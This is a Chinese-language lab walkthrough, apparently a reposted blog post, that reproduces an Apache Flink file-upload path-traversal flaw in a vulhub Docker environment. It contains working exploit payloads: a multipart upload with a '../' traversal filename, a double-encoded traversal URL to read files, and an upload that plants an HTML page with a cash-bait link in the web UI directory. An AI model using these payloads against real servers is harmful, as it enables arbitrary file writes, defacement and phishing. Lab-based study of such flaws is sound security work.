当前位置:网站首页>Apache Fink 文件上传漏洞复现及利用

Apache Fink 文件上传漏洞复现及利用

2022-08-11 05:32:00 Tauil

Apache Fink 文件上传漏洞复现

打开vulhub靶场,输入命令

cd flink/CVE-2020-17519
sudo docker-compose up -d
sudo docker-compose ps

登录靶场网页http://靶场IP:8081,然后在Submit New job处发现有上传点,f12查看网络数据包,然后上传任意文件

在这里插入图片描述随后可以看到网页POST一个数据包,数据包中的文件,右键点击重发,然后可以看到数据包中内容

在这里插入图片描述

boundary是分隔符,不用关注,查看到其fliname应该就是文件的名称,其创建文件的路径猜测是其默认文件路径的 xxx/xxx/jars/upload/test.jar ,如果他没有在这个fliname处进行检查或者强制规定的路径,而是使用类似 touch xxx/xxx/jars/upload/test.jar 这样的直接创建文件的命令,我们可以通过修改fliname,令其命令达到类似 touch xxx/xxx/jars/upload/../../../../../../../tmp/test.jar 的效果,所以我们修改消息体内容为

Content-Type: application/octet-stream 是让文件默认为字节流,浏览器处理这种类型的文件默认是下载,我们要显示他,所以要把它删掉

-----------------------------160778796920884667481441541505
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../../tmp/test"

123456789
-----------------------------160778796920884667481441541505--

在这里插入图片描述

其它不修改,然后点击发送,因为该版本的 Apache Flink 中存在有一个目录穿越漏洞,详细内容在https://blog.csdn.net/Tauil/article/details/125930144,我们可以使用该漏洞查看我们创建的内容

输入URL:

http://靶机IP:8081/jobmanager/logs/…%252f…%252f…%252f…%252f…%252f…%252ftmp%252ftest

在这里插入图片描述

Apache Fink 文件上传漏洞利用

这时我们可以在Job Manager中发现该网页文件地址

在这里插入图片描述

网页图形界面一般为 xxx+xxx+ui 现在我们知道了他的命名格式是 flink-web-xxx ,所以猜测该网页文件地址应该是在 tmp/flink-web-2dd3149d-f348-4e1e-88ed-4ed72f05728b/flink-web-ui

修改数据包为

-----------------------------160778796920884667481441541505
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../../tmp/flink-web-2dd3149d-f348-4e1e-88ed-4ed72f05728b/flink-web-ui/win.html"

<h1>Congratulations</h1>
<a href="https://www.baidu.com">Click here to get one hundred dollers</a> 

-----------------------------160778796920884667481441541505--

在这里插入图片描述
发送后输入URL:http://靶机IP:8081/win.html 即可访问我们写入的网页

在这里插入图片描述

原网站

版权声明
本文为[Tauil]所创,转载请带上原文链接,感谢
https://blog.csdn.net/Tauil/article/details/126042037